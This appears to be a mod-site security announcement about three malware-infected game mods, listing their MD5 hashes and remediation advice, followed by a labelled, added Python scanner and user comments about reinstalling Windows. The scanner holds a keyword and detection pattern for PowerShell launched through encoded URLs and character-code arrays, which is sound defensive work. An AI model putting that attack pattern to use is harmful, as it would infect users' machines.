If you had installed the following mods:
"Auto Save on Exit" by Subaiy MD5 hash - 6246fa47c492250128cbb4a463d2161a
"Kill Counter" by Daniel (if you downloaded this one: https://modworkshop.net/mod/56156 you are fine.) MD5 hash - bcee56cc847489a2a328189ba882d95e
"Enemies Drop Better Loot" by Krunker (if you downloaded this one: https://modworkshop.net/mod/56230 you are fine.) MD5 hash - ba9e7d88f1079c0324d53bde5786e4da
Your PC is likely infected with malware. Do a proper reset of your computer.
What are we gonna do next?
- We are going to look for moderators to look at new mods for RTV.
- We'll be looking into ways to improve the site itself to better protect against these bad actors and also to let users know if a mod was infected - https://modworkshop.net/thread/13229.
What can you do?
- Again, if you are infected, factory reset your computer.
- Search for suspicious things in the mods you download (like "powershell")
These attacks all follow the same pattern: they execute a PowerShell script using some encoded URL.
- Check file hash of the file you downloaded using: https://hash-file.online.
- Any mod containing a PowerShell script without a good reason should be reported to moderators.
- Any mod that isn't open-source should be reported.
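Added example (not part of the original post and not modworkshop's own tooling): a small checker that combines the two pieces of advice above, comparing a file's MD5 against the three hashes listed and searching for "powershell" both in plain text and inside lists of decimal character codes. The keyword list, the minimum run length of 8 and the sample strings are assumptions made for this example.

```python
import hashlib
import re

# MD5 hashes of the infected downloads, as listed in the announcement above.
KNOWN_BAD_MD5 = {
    "6246fa47c492250128cbb4a463d2161a",
    "bcee56cc847489a2a328189ba882d95e",
    "ba9e7d88f1079c0324d53bde5786e4da",
}
# Assumed keyword list; the post itself only names "powershell".
KEYWORDS = ("powershell", "http://", "https://")
# A run of 8 or more comma-separated integers, e.g. [64, 101, 99, ...].
# The minimum length of 8 is an assumption to skip ordinary short arrays.
INT_RUN = re.compile(r"\d{1,7}(?:\s*,\s*\d{1,7}){7,}")


def decode_int_runs(text):
    """Yield each long integer run decoded as character codes."""
    for match in INT_RUN.finditer(text):
        codes = [int(n) for n in re.split(r"\s*,\s*", match.group())]
        if all(c < 0x110000 for c in codes):
            yield "".join(chr(c) for c in codes)


def scan_mod(data):
    """Return a list of findings for the raw bytes of one mod file."""
    findings = []
    if hashlib.md5(data).hexdigest() in KNOWN_BAD_MD5:
        findings.append("md5 matches a known infected download")
    text = data.decode("utf-8", errors="replace")
    lowered = text.lower()
    findings += [f"plain text contains {k!r}" for k in KEYWORDS if k in lowered]
    for decoded in decode_int_runs(text):
        hits = [k for k in KEYWORDS if k in decoded.lower()]
        if hits:
            findings.append(f"char-code array decodes to text with {hits}")
    return findings


# Constructed samples: the array is generated here from a harmless string,
# it is not the payload from the infected mods.
_hidden = 'powershell.exe -c "Write-Output constructed-sample"'
SAMPLE_BAD = ("var c = [" + ",".join(str(ord(ch)) for ch in _hidden) + "]").encode()
SAMPLE_OK = b"var spawn_weights = [10, 20, 30, 40, 50, 60, 70, 80, 90]"

if __name__ == "__main__":
    for name, blob in (("bad", SAMPLE_BAD), ("ok", SAMPLE_OK)):
        print(name, scan_mod(blob))
```

An empty result only means none of these specific checks fired; it does not show that a mod is clean.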
I appreciate you guys spotting this and working fast to remove the mods. Sucks to have to reset my whole system but hey, I got Windows 10 back and I'm running faster than ever now. Also lost 200 GB of mysteriously unaccounted for space on my C: Drive. Blessing in disguise I guess!
Well, you don't really have to if you know what to do
@flockers What can you do without reinstalling windows?
@zackmathissa141 Run Malwarebytes like a normal human being
@soybean_alien
Running Malwarebytes can help, but it doesn't guarantee that your computer is clean. If the malware executed, it could have downloaded a different payload or used stuff like in-memory execution that's way harder to detect afterward. There is a chance that Malwarebytes catches it through behavior detection, but since it's not 100% reliable it's just way safer to reinstall the whole operating system.
Even if everything looks fine, there is that chance that the attacker has all the time in the world to do whatever with your login sessions or tokens. Better safe than sorry in situations like these.
Agreeing with Nok here, Malwarebytes is great but it's not a guaranteed flawless solution. It will take care of many things, but a lot of newer malicious code, especially ones that can fly past VirusTotal effortlessly, can be a bit trickier.